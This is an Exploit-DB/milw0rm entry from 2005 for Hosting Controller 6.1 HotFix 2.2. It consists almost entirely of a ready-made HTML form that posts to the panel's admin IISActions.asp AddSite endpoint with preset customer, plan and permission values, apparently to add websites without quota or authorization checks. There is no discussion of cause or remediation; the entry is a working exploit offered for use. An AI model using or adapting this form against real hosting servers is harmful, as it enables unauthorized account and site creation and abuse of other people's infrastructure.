Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit

2005-07-18T00:00:00
ID EDB-ID:1112
Type exploitdb
Reporter Soroush Dalili
Modified 2005-07-18T00:00:00

Description

Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit. Webapps exploit for asp platform

                                        
                                            &lt;!-- Change [url] /str0ke --&gt;

&lt;form method="post" name="addform" action="http://[url]/admin/iis/IISActions.asp?ActionType=AddSite&hostcustid=1&hostingplans=1"&gt;
&lt;table&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="Contents"&gt;Website Name : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;
&lt;input type="text" size="25" name="fServerComment"&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
ThirdLevelDomainCheck: &lt;/td&gt;&lt;td&gt;&lt;input type="TEXT" name="ThirdLevelDomainCheck" value="FALSE"&gt;&lt;/td&gt;
&lt;/tr&gt;WebUsers: &lt;input type="TEXT" name="WebUsers" ID="WebUsers" value="YourUsername"&gt;&lt;br&gt;
hostcustid: &lt;input type="TEXT" name="hostcustid" ID="hostcustid" value="1"&gt;&lt;tr&gt;
&lt;td height="0" colspan="2"&gt;
&lt;table width="100%" cellspacing="0" cellpadding="0"&gt;
&lt;tr class="LoopListingdark"&gt;
&lt;td width="19%" class="contents"&gt; Website Type : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;select name="IPLessCheckBox" id="IPLessCheckBox"&gt;&lt;option value="NO"&gt;IP Based Domain&lt;/option&gt;&lt;option value="YES"&gt;
       Name Based Domain
      &lt;/option&gt;&lt;/select&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;div id="DivIPBased" style="font:10px bold;Visibility:Visible"&gt;
&lt;table width="100%" ID="Table1" cellspacing="1" cellpadding="0" border="0" height="100%"&gt;IPAddress : &lt;input type="TEXT" name="fIPAddress" value="127.0.0.1" ID="TEXT1"&gt;PortNo :&lt;input type="TEXT" size="30" name="fPortNo" value="80" ID="TEXT2"&gt;IPLessDomain: &lt;input type="TEXT" name="fIPLessDomain" value="FALSE" ID="TEXT3"&gt;&lt;/table&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan="2" align="left"&gt;
&lt;table width="100%" cellspacing="0" cellpadding="0"&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; Mail Access : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="checkbox" name="mailaccess" value="YES" ID="mailaccess" checked&gt; Enable
   &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;div id="DivMailAccess" style="font:10px bold;Visibility:Visible"&gt;
&lt;table class="bg2" width="100%" border="0" cellspacing="1"&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt;  Mail Server : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;select id="Select3" name="MailServerType"&gt;&lt;option&gt;IMail Server&lt;/option&gt;
&lt;option&gt;Merak Mail Server&lt;/option&gt;
&lt;option&gt;MailEnable Server&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; Mail Password : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="password" id="mailpassword" name="mailpassword"&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;SiteType: &lt;/td&gt;&lt;td&gt;&lt;input type="TEXT" name="SiteType" value="www" ID="TEXT4"&gt;&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents" colspan="2"&gt; &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan="2" align="left"&gt;
&lt;div id="DivAdvSettings" style="font:10px bold;Visibility:Visible"&gt;
&lt;table width="100%" border="0" ID="Table3" cellspacing="1" cellpadding="1"&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; Allow Anonymous : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="radio" name="AllowAnon" value="NO" ID="Radio1"&gt;No
        &lt;input type="radio" name="AllowAnon" value="YES" ID="Radio2" checked&gt;Yes
       &lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; Access Permissions : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="checkbox" name="Read" value="YES" ID="Checkbox1" checked&gt;Read
        &lt;input type="checkbox" name="Write" value="YES" ID="Checkbox2"&gt;Write
        &lt;input type="checkbox" name="Script" value="YES" ID="Checkbox3" checked&gt;Script
       &lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="checkbox" name="Execute" value="YES" ID="Checkbox4"&gt;Execute (Includes Script)
       &lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="checkbox" name="DirBrowsing" value="YES" ID="Checkbox5"&gt;Directory Browsing Allowed
       &lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="checkbox" name="FrontPageWeb" value="YES" ID="Checkbox6"&gt; Install FrontPage Extensions
       &lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt;Enable Default Document : &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="Checkbox" name="enabledefaultdoc" value="YES" ID="Checkbox7" checked&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="looplistingDark"&gt;
&lt;td width="19%" class="contents"&gt; &lt;/td&gt;
&lt;td width="73%" class="contents"&gt;&lt;input type="Text" name="defaultdoc" value="Default.htm,default.asp,index.htm,index.html,index.cfm,index.asp,default.aspx,index.aspx" size="60" ID="Text1"&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="btnbg"&gt;
&lt;td width="73%" align="right" class="btnbg" colspan="2"&gt;
&lt;table cellpadding="0" cellspacing="0" border="0"&gt;
&lt;tr&gt;
&lt;td&gt;&lt;input type="submit" class="butn" name="Add Site2" value="  Next  &gt;&gt;  "&gt; &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/form&gt;

# milw0rm.com [2005-07-18]